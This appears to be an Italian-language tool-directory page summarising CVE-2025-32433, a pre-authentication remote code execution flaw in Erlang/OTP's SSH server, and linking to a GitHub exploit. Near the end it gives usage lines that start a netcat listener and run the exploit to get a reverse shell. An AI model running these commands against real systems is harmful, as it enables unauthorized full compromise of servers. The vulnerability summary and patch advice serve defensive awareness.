Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32433 — CVE-2025-32433 Riepilogo e Panoramica dell'Attacco | Kitploit
Strumenti/GitHubGitHub/mrdreamreal/cve-2025-32433
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 Riepilogo e Panoramica dell'Attacco

Vedi Repository
251 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-32433

Sintesi e panoramica dell'attacco CVE-2025-32433

CVE-2025-32433 è una vulnerabilità critica di esecuzione remota di codice (RCE) non autenticata nel server SSH Erlang/OTP, divulgata il 16 aprile 2025. Erlang/OTP SSH è una libreria utilizzata in varie applicazioni distribuite e di telecomunicazione. Il difetto deriva dalla gestione impropria dei messaggi del protocollo SSH: il server non applica la normale sequenza di autenticazione, consentendo a un attaccante di inviare messaggi SSH appositamente costruiti prima dell'autenticazione. In questo modo, l'attaccante può iniettare ed eseguire codice Erlang arbitrario sul server​ nvd.nist.gov ​ offsec.com . In termini pratici, ciò significa che un attaccante con accesso di rete a un server SSH Erlang/OTP vulnerabile (spesso eseguito come root) può attivare una reverse shell o eseguire comandi senza alcuna credenziale, portando alla compromissione totale del sistema​ nvd.nist.gov ​ offsec.com . A questa vulnerabilità è assegnato un CVSS 10.0 (gravità massima)​ offsec.com .

Le versioni interessate sono tutte le release Erlang/OTP precedenti a OTP-27.3.3, OTP-26.2.5.11 o OTP-25.3.2.20 (le versioni corrette)​ nvd.nist.gov ​ offsec.com . I sistemi interessati includono spesso server Linux o appliance che eseguono un demone SSH basato su Erlang (da non confondere con OpenSSH). È importante notare che i server OpenSSH predefiniti su Linux/BSD non sono vulnerabili​ offsec.com . Gli utenti dovrebbero considerare vulnerabile qualsiasi server SSH Erlang/OTP esposto e applicare immediatamente le patch ufficiali o disabilitare il servizio SSH.

L'attacco funziona avviando una connessione SSH e inviando poi una sequenza di messaggi SSH fuori ordine. :

uso:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

es:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

Scarica lo strumento